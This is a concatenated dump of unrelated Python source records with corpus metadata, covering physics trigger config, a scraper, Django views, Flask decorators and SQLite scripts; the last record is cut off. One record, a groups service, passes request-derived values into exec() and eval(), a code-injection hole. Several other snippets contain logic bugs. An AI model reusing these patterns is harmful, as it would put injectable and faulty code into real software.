\"NINTREE(((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')) & (BPVIPCHI2() < 16))\",\n 'ipchi2' : \"BPVIPCHI2()\",\n 'n1trk' : \"NINTREE(((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')) & (PT > 1*GeV) & (BPVIPCHI2() > 16))\"},\n 'BDT_MIN': 0.0,\n 'CMB_VRT_MCOR_MIN': 1000*MeV,\n 'CMB_VRT_MCOR_MAX': 10000*MeV},\n 'HHHCombiner': 'Topo3BodyCombos',\n 'HHHGammaCombo': comb_cuts,\n 'HHHGammaBBDT': {'BDT_PARAMS': 'Hlt2_RadiativeInc_3plus1_BDTParams_v1r0.txt',\n 'BDT_VARMAP': {'nbody_doca_max' : 'log10(BPVIPCHI2())',\n 'sv_children_pt_sum': '(CHILD(1, PT) + CHILD(2, PT))*MeV',\n 'gamma_pt' : 'CHILD(2, PT)*MeV',\n 'nbody_fdchi2' : 'log10(BPVVDCHI2)',\n 'sv_vtx_chi2' : 'log10(VFASPF(VCHI2))'},\n 'BDT_MIN': 0.0,\n 'CMB_VRT_MCOR_MIN': 1000*MeV,\n 'CMB_VRT_MCOR_MAX': 10000*MeV},\n 'HHHGammaComboEE': comb_cuts,\n 'HHHGammaEEBBDT': {'BDT_PARAMS': 'hlt2_topo_run2_v1.bbdt',\n 'BDT_VARMAP': {'n' : \"NINTREE((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma'))\",\n 'mcor' : \"BPVCORRM\",\n 'chi2' : \"VFASPF(VCHI2)\",\n 'sumpt' : \"SUMTREE(PT, ((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')), 0.0)/MeV\",\n 'eta' : \"BPVETA\",\n 'fdchi2' : \"BPVVDCHI2\",\n 'minpt' : \"MINTREE(((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')), PT)/MeV\",\n 'nlt16' : \"NINTREE(((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')) & (BPVIPCHI2() < 16))\",\n 'ipchi2' : \"BPVIPCHI2()\",\n 'n1trk' : \"NINTREE(((ABSID=='K+')|(ID=='KS0')|(ABSID=='Lambda0')|(ABSID=='gamma')) & (PT > 1*GeV) & (BPVIPCHI2() > 16))\"},\n 'BDT_MIN': 0.0,\n 'CMB_VRT_MCOR_MIN': 1000*MeV,\n 'CMB_VRT_MCOR_MAX': 10000*MeV}}\n\n @staticmethod\n def get_hlt1():\n hlt1 = {}\n for line in ['RadiativeIncHHGamma', 'RadiativeIncHHHGamma', 'RadiativeIncHHGammaEE', 'RadiativeIncHHHGammaEE']:\n hlt1[line] = \"HLT_PASS_RE('Hlt1(Two)?TrackMVADecision')\"\n return hlt1\n\n @staticmethod\n def get_l0():\n l0 = {}\n for line in ['RadiativeIncHHGamma', 'RadiativeIncHHHGamma']:\n l0[line] = \"(L0_CHANNEL('Electron') | L0_CHANNEL('Photon'))\"\n return l0\n\n# EOF\n","sub_path":"Hlt/Hlt/Hlt2Lines/python/Hlt2Lines/Radiative/Inclusive.py","file_name":"Inclusive.py","file_ext":"py","file_size_in_byte":8429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"529425346","text":"from lxml import etree\nfrom io import StringIO, BytesIO\nimport requests\nimport sys\nfrom datetime import datetime\n\nclass Showing(object):\n def __init__(self, title, time):\n self.title = title\n self.time = time\n\ndef getDates():\n today = datetime.today()\n thisMonth = [today.month, today.year]\n def nextMonth(month):\n if month == 12:\n return [month + 1, today.year + 1]\n else:\n return [month + 1, today.year]\n return [thisMonth, nextMonth(today.month)]\n\ndef buildUri(month):\n baseUri = 'http://hollywoodtheatre.org/wp-admin/admin-ajax.php?action=aec_ajax&aec_type=widget&aec_widget_id=aec_widget-5-container'\n monthArg = '&aec_month=' + str(month[0])\n yearArg = '&aec_year=' + str(month[1])\n uri = baseUri + monthArg + yearArg\n return uri\n\ndef makeRequest(uri):\n page = requests.get(uri)\n parser = etree.HTMLParser()\n tree = etree.parse(StringIO(page.text), parser)\n days = tree.xpath('//div[@class=\\'aec-event-info\\']')\n return days\n\ndef parseHtml(days):\n for day in days:\n date = day.xpath('h2[@class=\\'widgettitle\\']/text()')[0]\n date = date.replace(\"Showing \", \"\")\n date = datetime.strptime(date, '%B %d, %Y')\n films = day.xpath('.//li[@class=\\'aec-tooltip-feed-agile\\']')\n\n for film in films:\n film = film.xpath('p/strong/text()')[0]\n film = film.split(' | ')\n title = film[0]\n times = film[1]\n times = times.split()\n\n for time in times:\n time = datetime.strptime(time, '%I:%M%p')\n time = date.replace(hour=time.hour, minute=time.minute)\n showing = Showing(title, time)\n print (showing.title, showing.time)\n\ndef main():\n months = getDates()\n thisMonthUri = buildUri(months[0])\n nextMonthUri = buildUri(months[1])\n thisMonthResponse = makeRequest(thisMonthUri)\n nextMonthResponse = makeRequest(nextMonthUri)\n responses = thisMonthResponse + nextMonthResponse\n output = parseHtml(responses)\n\nmain()\n","sub_path":"hollywood-scraper.py","file_name":"hollywood-scraper.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"207163294","text":"import logging\nimport random\nfrom typing import List, Tuple\n\nimport stanza\nfrom stanza import Document\n\nfrom data_processing.class_defs import SquadExample, QAExample\nfrom data_processing.parse import read_squad_dataset, read_qa_dataset\nfrom defs import SQUAD_DEV, SQUAD_TRAIN, MEDQUAD_TRAIN, MEDQUAD_DEV, MEDQA_HANDMADE_FILEPATH\n\n\nclass NQGDataset:\n class Answer:\n\n def __init__(self, start_index, nb_words, text):\n super(NQGDataset.Answer, self).__init__()\n self.start_index = start_index\n self.nb_words = nb_words\n self.text = text\n\n def __init__(self, dataset_name=\"squad\", mode=\"train\", data_limit=-1):\n super(NQGDataset, self).__init__()\n stanza.download('en')\n self.nlp = stanza.Pipeline('en', processors='tokenize,pos,ner')\n self.datatype = QAExample\n if dataset_name == \"squad\":\n self.datatype = SquadExample\n if mode == \"train\":\n datapath = SQUAD_TRAIN\n elif mode == \"dev\":\n datapath = SQUAD_DEV\n else:\n raise ValueError()\n self.ds = read_squad_dataset(\n datapath,\n limit=data_limit\n )\n elif dataset_name == \"medquad\":\n if mode == \"train\":\n datapath = MEDQUAD_TRAIN\n elif mode == \"dev\":\n datapath = MEDQUAD_DEV\n else:\n raise ValueError()\n self.ds = read_qa_dataset(datapath, limit=data_limit)\n elif dataset_name == \"medqa_handmade\":\n if mode == \"test\":\n datapath = MEDQA_HANDMADE_FILEPATH\n else:\n raise ValueError()\n self.ds = read_qa_dataset(datapath, limit=data_limit)\n else:\n raise NotImplementedError()\n\n def get_dataset(self) -> Tuple[List[Document], List[Answer], List[str]]:\n contexts = []\n answers = []\n questions = []\n issues = 0\n for example in self.ds:\n if self.datatype == SquadExample:\n analyzed = self.nlp(example.context)\n answer = example.answer\n start_index = None\n end_index = None\n for i, word in enumerate(analyzed.iter_words()):\n if start_index is None and word.text == answer.text[:len(word.text)]:\n start_index = i\n if start_index is not None and word.text == answer.text[-len(word.text):]:\n end_index = i\n if (start_index is None) or (end_index is None):\n issues += 1\n logging.warning(f\"Issue while parsing answer '{answer.text}'\")\n continue\n answers.append(NQGDataset.Answer(\n start_index,\n end_index - start_index + 1,\n text=answer.text\n ))\n else:\n analyzed = self.nlp(example.answer.text)\n answers.append(NQGDataset.Answer(\n start_index=example.answer.answer_start,\n nb_words=analyzed.num_tokens,\n text=example.answer.text\n ))\n contexts.append(analyzed)\n questions.append(example.question.question.lower())\n logging.info(f\"Issues: {issues}\")\n return contexts, answers, questions\n\n def get_split(self, first_part_size_ratio: float):\n \"\"\"\n :param first_part_size_ratio: Size ratio of the first returned dataset from the original one.\n :return: A tuple (ds1, ds2) where ds1 is `first_part_size_ratio` of the original dataset\n and ds2 the rest of it.\n \"\"\"\n c, a, q = self.get_dataset()\n ds = list(zip(c, a, q))\n random.shuffle(ds)\n c, a, q = zip(*ds)\n ds_size = len(c)\n first_part_size = int(first_part_size_ratio * ds_size)\n return c[:first_part_size], a[:first_part_size], q[:first_part_size], c[first_part_size:], a[first_part_size:],\\\n q[first_part_size:]\n","sub_path":"data_processing/nqg_dataset.py","file_name":"nqg_dataset.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"390889765","text":"from datetime import date\nfrom rest_framework.response import Response\n\nfrom apps.users.models import User\n# # 获取今天date\n# today = date.today\n# # 过滤查询\n# count = User.objects.filter(last_login_gte=today).count()\n\n\n# 代码应该写入类视图\nfrom rest_framework.views import APIView\n\n\nclass UserActiveAPIView(APIView):\n def get(self, request):\n # 获取今天date\n today = date.today()\n # 过滤查询\n count = User.objects.filter(last_login__gte=today).count()\n return Response({'count': count})\n\n\n# 下单用户\nclass UserOrderAPIView(APIView):\n def get(self, request):\n today = date.today()\n count = User.objects.filter(orderinfo__create_time__gte=today)\n return Response({'count': count})\n\n\n\"\"\"\n1 返回的数据形式\n2 我们先获取今天的日期,在获取三十天之前的日期进行遍历.\n\"\"\"\nfrom datetime import timedelta\n\n\nclass UserMonthAPiView(APIView):\n def get(self, request):\n today = date.today()\n befor_date = today - timedelta(days=30)\n data_list = []\n for i in range(0, 30):\n start_date = befor_date + timedelta(days=i)\n end_date =befor_date + timedelta(days=(i + 1))\n count = User.objects.filter(date_joined__gte=start_date, date_joined__gt=end_date).count()\n data_list.append({\n 'count': count,\n 'date': start_date\n })\n return Response(data_list)\n","sub_path":"meiduo_mall/apps/meiduo_admin/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"172604521","text":"\n\nfrom xai.brain.wordbase.nouns._chock import _CHOCK\n\n#calss header\nclass _CHOCKED(_CHOCK, ):\n\tdef __init__(self,): \n\t\t_CHOCK.__init__(self)\n\t\tself.name = \"CHOCKED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"chock\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_chocked.py","file_name":"_chocked.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"434789638","text":"from pupilpermissions.data.groups import Groups\nfrom pupilpermissions.data.dbsession import DbSessionFactory\nfrom pupilpermissions.services.logging_service import LoggingService\n\n\nclass GroupsService():\n @staticmethod\n def list_all_attributes() -> list:\n return ['id', 'group_name', 'group_desc']\n\n @staticmethod\n def get_all_groups():\n session = DbSessionFactory.create_session()\n groups_output_list = []\n for group in session.query(Groups).all():\n current_group_dict={}\n for attribute in GroupsService.list_all_attributes():\n current_group_dict[attribute] = eval('group.' + attribute)\n groups_output_list.append(current_group_dict)\n session.close()\n return groups_output_list\n\n @staticmethod\n def get_group_names():\n session = DbSessionFactory.create_session()\n groups_output_dict={}\n for group in session.query(Groups).all():\n groups_output_dict[group.id] = group.group_name\n session.close()\n return groups_output_dict\n\n @staticmethod\n def get_single_group_info(group_id) -> dict:\n session = DbSessionFactory.create_session()\n attributes = GroupsService.list_all_attributes()\n group_info_return = {}\n group_info = session.query(Groups).get(group_id)\n for attribute in attributes:\n group_info_return[attribute] = eval('group_info.' + attribute)\n session.close()\n return group_info_return\n\n @staticmethod\n def store_group_info(group_to_store):\n attributes = GroupsService.list_all_attributes()\n session = DbSessionFactory.create_session()\n group_to_be_stored = session.query(Groups).get(group_to_store['id'])\n for attribute in attributes:\n exec(\"group_to_be_stored.\" + attribute + \"='\" + group_to_store[attribute] + \"'\")\n session.commit()\n LoggingService.add_entry(group_to_store, 'group', 'store')\n session.close()\n return\n\n @staticmethod\n def delete_group(group_id):\n session = DbSessionFactory.create_session()\n session.query(Groups).filter(Groups.id == group_id).delete()\n session.commit()\n deleted_group = {'id': group_id}\n LoggingService.add_entry(deleted_group, 'group', 'delete')\n session.close()\n return\n\n @staticmethod\n def create_new_group(group_info):\n session = DbSessionFactory.create_session()\n group_to_store = Groups()\n for key in group_info.keys():\n exec(\"group_to_store.\" + key + \"='\" + group_info[key] + \"'\")\n session.add(group_to_store)\n session.commit()\n LoggingService.add_entry(group_info, 'group', 'create')\n session.close()\n return\n\n","sub_path":"pupilpermissions/services/groups_service.py","file_name":"groups_service.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"127678880","text":"# Google STEP imitiation interview quesion.\n\n# Worked on June 22nd 2018.\n\n# Q1. Given an array of integers, you need to find the local maxima.\n#\n# Example : [1 3 5 4 7 10 6]\n#\n# Output : 5 or 10\n#\n# Explanation : Any of the local maxima can be the output.\n# Here 5 is greater than 3 and 4, 10 is greater than 7 and 6.\n\n\n## INPUT ##\n# 1: Random numbers\n# 2: Long as possible\n# 3: (-inf, inf)\n\n## Output ##\n# 1: Multiple local maxima (example: a or b or c).\n\n## Cases ##\n# 1: All same numbers\n# 2: Just increasing\n# 3: Just decreasing\n# 4: Only one coordinate point (example: length of the list is 1).\n\n\n## Time Complexity ##\n# O(n)\n\n\n## Not solved ##\n# Check if the local maxima values are all different.\n# If there is two 3 local maxima in the array, only return one.\n\n\narr = [1, 2, 3, 2, 1, 3, 2, 1]\n\ndef localMaxima(arr):\n peaks = [] # Store the local maxima values\n all_same = True # Check if all the values are same or not.\n dir = False # Change dir. Increasing -> True. Decreasing -> False.\n\n\n for index in range(0, len(arr)-1, 1):\n if arr[index + 1] > arr[index]:\n dir = True\n all_same = False\n else:\n if arr[index + 1] != arr[index]:\n if dir:\n dir = False\n peaks.insert(0, arr[index])\n\n if all_same:\n return arr[0]\n else:\n result = \"\"\n for x in peaks:\n if result == \"\":\n result = result + str(x)\n else:\n result = result + \" or \" + str(x)\n\n return result\n\nlocalMaxima(arr)\n\n\n\nprint(localMaxima(arr))\n","sub_path":"prac_2.py","file_name":"prac_2.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"459062814","text":"from functools import wraps\nfrom json import JSONDecodeError\n\nfrom flask import request\nfrom schema import Schema, SchemaError\nfrom werkzeug.exceptions import BadRequest, Forbidden\n\nfrom pysite.base_route import APIView, RouteView\nfrom pysite.constants import BOT_API_KEY, CSRF, DEBUG_MODE, ErrorCodes, ValidationTypes\n\n\ndef csrf(f):\n \"\"\"\n Apply CSRF protection to a specific view function.\n \"\"\"\n\n @wraps(f)\n def inner_decorator(*args, **kwargs):\n CSRF.protect()\n\n return f(*args, **kwargs)\n\n return inner_decorator\n\n\ndef require_roles(*roles: int):\n def inner_decorator(f):\n\n @wraps(f)\n def inner(self: RouteView, *args, **kwargs):\n data = self.user_data\n\n if DEBUG_MODE:\n return f(self, *args, **kwargs)\n elif data:\n for role in roles:\n if role in data.get(\"roles\", []):\n return f(self, *args, **kwargs)\n\n if isinstance(self, APIView):\n return self.error(ErrorCodes.unauthorized)\n\n raise Forbidden()\n return self.redirect_login(**kwargs)\n\n return inner\n\n return inner_decorator\n\n\ndef api_key(f):\n \"\"\"\n Decorator to check if X-API-Key is valid.\n\n Should only be applied to functions on APIView routes.\n \"\"\"\n\n @wraps(f)\n def inner_decorator(self: APIView, *args, **kwargs):\n if not request.headers.get(\"X-API-Key\") == BOT_API_KEY:\n return self.error(ErrorCodes.invalid_api_key)\n return f(self, *args, **kwargs)\n\n return inner_decorator\n\n\ndef api_params(\n schema: Schema = None,\n validation_type: ValidationTypes = ValidationTypes.json,\n allow_duplicate_params: bool = False):\n \"\"\"\n Validate parameters of data passed to the decorated view.\n\n Should only be applied to functions on APIView routes.\n\n This will pass the validated data in as the first parameter to the decorated function.\n This data will always be a list, and view functions are expected to be able to handle that\n in the case of multiple sets of data being provided by the api.\n\n If `allow_duplicate_params` is set to False (only effects dictionary schemata\n and parameter validation), then the view will return a 400 Bad Request\n response if the client submits multiple parameters with the same name.\n \"\"\"\n\n def inner_decorator(f):\n\n @wraps(f)\n def inner(self: APIView, *args, **kwargs):\n if validation_type == ValidationTypes.json:\n try:\n if not request.is_json:\n return self.error(ErrorCodes.bad_data_format)\n\n data = request.get_json()\n\n if not isinstance(data, list) and isinstance(schema._schema, list):\n data = [data]\n\n except JSONDecodeError:\n return self.error(ErrorCodes.bad_data_format) # pragma: no cover\n\n elif validation_type == ValidationTypes.params and isinstance(schema._schema, list):\n # I really don't like this section here, but I can't think of a better way to do it\n multi = request.args # This is a MultiDict, which should be flattened to a list of dicts\n\n # We'll assume that there's always an equal number of values for each param\n # Anything else doesn't really make sense anyway\n data = []\n longest = None\n\n for _key, items in multi.lists():\n # Make sure every key has the same number of values\n if longest is None:\n # First iteration, store it\n longest = len(items)\n\n elif len(items) != longest: # pragma: no cover\n # At least one key has a different number of values\n return self.error(ErrorCodes.bad_data_format) # pragma: no cover\n\n if longest is not None:\n for i in range(longest): # Now we know all keys have the same number of values...\n obj = {} # New dict to store this set of 
values\n\n for key, items in multi.lists():\n obj[key] = items[i] # Store the item at that specific index\n\n data.append(obj)\n\n elif validation_type == ValidationTypes.params and isinstance(schema._schema, dict):\n if not allow_duplicate_params:\n for _arg, value in request.args.to_dict(flat=False).items():\n if len(value) > 1:\n raise BadRequest(\"This view does not allow duplicate query arguments\")\n data = request.args.to_dict()\n elif validation_type == ValidationTypes.none:\n return f(self, None, *args, **kwargs)\n\n else:\n raise ValueError(f\"Unknown validation type: {validation_type}\") # pragma: no cover\n\n try:\n schema.validate(data)\n except SchemaError as e:\n return self.error(ErrorCodes.incorrect_parameters, str(e))\n\n return f(self, data, *args, **kwargs)\n\n return inner\n\n return inner_decorator\n","sub_path":"pysite/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"652130953","text":"import cv2\nimport sys,os\nsys.path.append(os.pardir)\nfrom common.module_image import *\n\ndef main():\n\n path = \"../../Data/Lane_Detection_Images/\"\n roadImage_01 = \"solidWhiteCurve.jpg\"\n roadImage_02 = \"solidWhiteRight.jpg\"\n roadImage_03 = \"solidYellowCurve.jpg\"\n roadImage_04 = \"solidYellowCurve2.jpg\"\n roadImage_05 = \"solidYellowLeft.jpg\"\n roadImage_06 = \"whiteCarLaneSwitch.jpg\"\n\n openPath = path+roadImage_01\n\n roadColor = imageRead(openPath, cv2.IMREAD_COLOR) \n roadGray = imageRead(openPath, cv2.IMREAD_GRAYSCALE)\n roadOrigin = imageRead(openPath) # default\n imageWrite(path+\"roadGray.jpg\", roadGray)\n\n imageShow(\"roadColor, cv2.WINDOW_NORMAL\", roadColor, cv2.WINDOW_NORMAL)\n imageShow(\"roadColor, cv2.WINDOW_AUTOSIZE\", roadColor, cv2.WINDOW_AUTOSIZE)\n imageShow(\"roadColor, cv2.WINDOW_FREERATIO\", roadColor, cv2.WINDOW_FREERATIO)\n imageShow(\"roadColor, cv2.WINDOW_GUI_NORMAL\", roadColor, cv2.WINDOW_GUI_NORMAL)\n imageShow(\"roadColor, cv2.WINDOW_GUI_EXPANDED\", roadColor, cv2.WINDOW_GUI_EXPANDED)\n\n imageShow(\"roadGray, cv2.WINDOW_NORMAL\", roadGray, cv2.WINDOW_NORMAL)\n imageShow(\"roadGray, cv2.WINDOW_AUTOSIZE\", roadGray, cv2.WINDOW_AUTOSIZE)\n imageShow(\"roadGray, cv2.WINDOW_FREERATIO\", roadGray, cv2.WINDOW_FREERATIO)\n imageShow(\"roadGray, cv2.WINDOW_GUI_NORMAL\", roadGray, cv2.WINDOW_GUI_NORMAL)\n imageShow(\"roadGray, cv2.WINDOW_GUI_EXPANDED\", roadGray, cv2.WINDOW_GUI_EXPANDED)\n\n imageShow(\"roadOrigin, cv2.WINDOW_NORMAL\", roadOrigin, cv2.WINDOW_NORMAL)\n imageShow(\"roadOrigin, cv2.WINDOW_AUTOSIZE\", roadOrigin, cv2.WINDOW_AUTOSIZE)\n imageShow(\"roadOrigin, cv2.WINDOW_FREERATIO\", roadOrigin, cv2.WINDOW_FREERATIO)\n imageShow(\"roadOrigin, cv2.WINDOW_GUI_NORMAL\", roadOrigin, cv2.WINDOW_GUI_NORMAL)\n imageShow(\"roadOrigin, cv2.WINDOW_GUI_EXPANDED\", roadOrigin, cv2.WINDOW_GUI_EXPANDED)\n\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main()","sub_path":"Python (copy)/1st_02H/01_Image_Read,Show,Write.py","file_name":"01_Image_Read,Show,Write.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"534512288","text":"from xml.etree import ElementTree\nfrom peewee import *\n\ndb = SqliteDatabase('payments.db')\n\n\nclass PaymentsDB(Model):\n class Meta:\n database = db\n db_table = \"payments\"\n\n user_name = CharField()\n payment_amount = DoubleField()\n payment_currency = CharField()\n payment_date = DateTimeField()\n\n def __str__(self):\n return f\"{self.user_name} \" \\\n f\"- {self.payment_amount} \" \\\n f\"- {self.payment_currency} \" \\\n f\"- {self.payment_date} \"\n\n @staticmethod\n def existing_queries(user_name, payment_date):\n existing = PaymentsDB.select().where(\n PaymentsDB.user_name == user_name,\n PaymentsDB.payment_date == payment_date\n )\n return existing\n\n @staticmethod\n def existing_queries0(**kwds):\n e0 = PaymentsDB.select()\n if not kwds:\n return e0\n for key, value in kwds.items():\n E0 = e0.where(getattr(PaymentsDB, key) == value)\n return E0\n\n\n\n# PaymentsDB.drop_table()\n\n\nclass ParsingXMLFile:\n\n @staticmethod\n def parse_file(file, seeking):\n tree = ElementTree.parse(file)\n root = tree.getroot()\n xmlpayments = root.findall(seeking)\n return xmlpayments\n\n\ndef main():\n\n PaymentsDB.create_table()\n\n path = 'paymnets.xml'\n keyword = 'payment'\n\n # парсинг данных\n parsed = ParsingXMLFile.parse_file(path, keyword)\n\n # создание БД\n for each in parsed:\n existing = PaymentsDB.existing_queries0(\n user_name=each.find('name').text,\n payment_date=each.get('date')\n )\n if existing.exists():\n continue\n else:\n PaymentsDB.create(user_name=each.find('name').text,\n payment_amount=each.find('amount').text,\n payment_currency=each.find('currency').text,\n payment_date=each.get('date')\n )\n\n pmts = PaymentsDB.select()\n for p in pmts:\n print(p)\n\n db.close()\n\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"payments/payments_xml.py","file_name":"payments_xml.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"7214946","text":"#built-in exception\r\na,b=5,0\r\ntry:\r\n print(\"Check for errors\")\r\n print(\"The result is\",a/b) \r\nexcept ZeroDivisionError as e:\r\n print(\"number cannot be divided by 0\",e)\r\nfinally:\r\n print(\"Executed successfully\")\r\n\r\n#user defined exception\r\nclass Error(Exception):\r\n pass\r\nclass TooLargeError(Error):\r\n def __init__(self,mesg):\r\n self.mesg=print(\"It is a large number than expected number\")\r\nclass TooSmallError(Error):\r\n def __init__(self,msg):\r\n self.msg=print(\"It is a small number than expected number\")\r\nnum=10\r\nwhile True:\r\n try:\r\n check=int(input(\"Enter a number\"))\r\n if check<10:\r\n raise TooSmallError(check)\r\n elif check>10:\r\n raise TooLargeError(check)\r\n except TooSmallError as se:\r\n print(\"You Entered a small number\",se)\r\n except TooLargeError as le:\r\n print(\"You Entered a large number\",le)\r\n else:\r\n print(\"You Entered correct number\")\r\n finally:\r\n print(\"The number checked successfully\")\r\n","sub_path":"08-Jul-2021/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"564007578","text":"#!pip install faker\nimport pandas as pd\nimport sqlite3\nimport numpy as np\nfrom itertools import repeat\nfrom faker import Faker\nfrom sklearn.utils import shuffle\n#Generating Data\ndef get_data(n,j):\n #Getting fake names\n fake = Faker()\n name_df = [fake.name() for i in range(n)]\n name_df = pd.DataFrame((name_df),columns=['name'])\n\n #Dataframe with Vectors for respective posts and post\n data = pd.read_csv (r'app/business_logic/csv/table3_vectors_for_posts.csv') \n orig_post_df = pd.DataFrame(data, columns= ['pi1','pi2','pi3','pi4','pi5','pi6','pi7','pi8','pi9','pi10','post'])\n post_df = orig_post_df.iloc[:,:]\n #print(df3)\n\n #Dataframe with Vectors for respective cities and city\n data = pd.read_csv (r'app/business_logic/csv/table4_vectors_for_cities.csv')\n orig_city_df = pd.DataFrame(data, columns= ['ci1','ci2','ci3','ci4','ci5','ci6','ci7','ci8','ci9','ci10','city'])\n city_df = orig_city_df.iloc[:,:]\n #print(df4)\n\n #Shuffling and storing the data n times\n new_city_df = city_df\n new_post_df = post_df\n\n for i in range(int(n/7)):\n city_df = shuffle(city_df)\n post_df = shuffle(post_df)\n new_city_df = pd.concat([new_city_df, city_df], axis=0)\n new_post_df = pd.concat([new_post_df, post_df], axis=0)\n\n #Getting n number of data\n normal_city_df = new_city_df.iloc[:,10]\n normal_post_df = new_post_df.iloc[:,10]\n n_city_df = new_city_df.iloc[:,:-1]\n n_post_df = new_post_df.iloc[:,:-1]\n\n n_city_df= new_city_df.head(n)\n n_post_df= new_post_df.head(n)\n normal_city_df= normal_city_df.head(n)\n normal_post_df= normal_post_df.head(n)\n\n #Resetting index\n n_city_df.reset_index(drop=True, inplace=True)\n n_post_df.reset_index(drop=True, inplace=True)\n normal_city_df.reset_index(drop=True, inplace=True)\n normal_post_df.reset_index(drop=True, inplace=True)\n\n #Dataframe ready for table 1 with name, post and city word embeddings\n df1 = pd.concat([name_df,n_post_df,n_city_df], axis=1)\n normal_df1 = pd.concat([name_df,normal_post_df,normal_city_df], axis=1)\n #print(df1)\n\n #Shuffling and resetting index for table 2 \n new_city_df = shuffle(new_city_df)\n new_post_df = shuffle(new_post_df)\n\n normal2_city_df = new_city_df.iloc[:,10]\n normal2_post_df = new_post_df.iloc[:,10]\n new_city_df = new_city_df.iloc[:,:-1]\n new_post_df = new_post_df.iloc[:,:-1]\n\n new_city_df= new_city_df.head(j)\n new_post_df= new_post_df.head(j)\n normal2_city_df= normal_city_df.head(j)\n normal2_post_df= normal_post_df.head(j)\n\n new_city_df.reset_index(drop=True, inplace=True)\n new_post_df.reset_index(drop=True, inplace=True)\n\n #Dataframe ready for table 2 with post and city\n df2 = pd.concat([new_post_df,new_city_df], axis=1)\n normal_df2 = pd.concat([normal2_post_df,normal2_city_df], axis=1)\n #print(df2)\n\n #Creating database\n connection = sqlite3.connect(\"position_city_database_with_embeddings.db\", check_same_thread=False)\n crsr = connection.cursor() \n\n #Comment the table creation and insertion of data into the table if the database is already created once.\n #Creating table1 with name, embeddings of post, and embeddings of city\n crsr.execute('CREATE TABLE name_post_city (NAME nvarchar(50),pi1 float,pi2 float,pi3 float,pi4 float,pi5 float,pi6 float,pi7 float,pi8 float,pi9 float,pi10 float, ci1 float,ci2 float,ci3 float,ci4 float,ci5 float,ci6 float,ci7 float,ci8 float,ci9 float,ci10 float, FOREIGN KEY (ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10) REFERENCES em_city_name(ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10), FOREIGN KEY 
(pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10) REFERENCES em_post_city(pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10))')\n df1.to_sql('name_post_city', connection, if_exists='replace', index = False)\n crsr.execute('''SELECT * FROM name_post_city''')\n # print(\"Table 1: Name_Post_City Data\")\n # for row in crsr.fetchall():\n # print (row)\n\n #Creating normal table1 with name,post, and city\n crsr.execute('CREATE TABLE normal_name_post_city (NAME nvarchar(50),pi1 float,pi2 float,pi3 float,pi4 float,pi5 float,pi6 float,pi7 float,pi8 float,pi9 float,pi10 float, ci1 float,ci2 float,ci3 float,ci4 float,ci5 float,ci6 float,ci7 float,ci8 float,ci9 float,ci10 float, FOREIGN KEY (ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10) REFERENCES em_city_name(ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10), FOREIGN KEY (pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10) REFERENCES em_post_city(pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10))')\n normal_df1.to_sql('normal_name_post_city', connection, if_exists='replace', index = False)\n crsr.execute('''SELECT * FROM normal_name_post_city''')\n # print(\"Normal Table 1: Normal_Name_Post_City Data\")\n # for row in crsr.fetchall():\n # print (row)\n\n #Creating table2 with embeddings of post and embeddings of city\n crsr.execute('CREATE TABLE post_city (pi1 float,pi2 float,pi3 float,pi4 float,pi5 float,pi6 float,pi7 float,pi8 float,pi9 float,pi10 float, ci1 float,ci2 float,ci3 float,ci4 float,ci5 float,ci6 float,ci7 float,ci8 float,ci9 float,ci10 float, FOREIGN KEY (ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10) REFERENCES em_city_name(ci1,ci2,ci3,ci4,ci5,ci6,ci7,ci8,ci9,ci10), FOREIGN KEY (pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10) REFERENCES em_post_city(pi1,pi2,pi3,pi4,pi5,pi6,pi7,pi8,pi9,pi10))')\n df2.to_sql('post_city', connection, 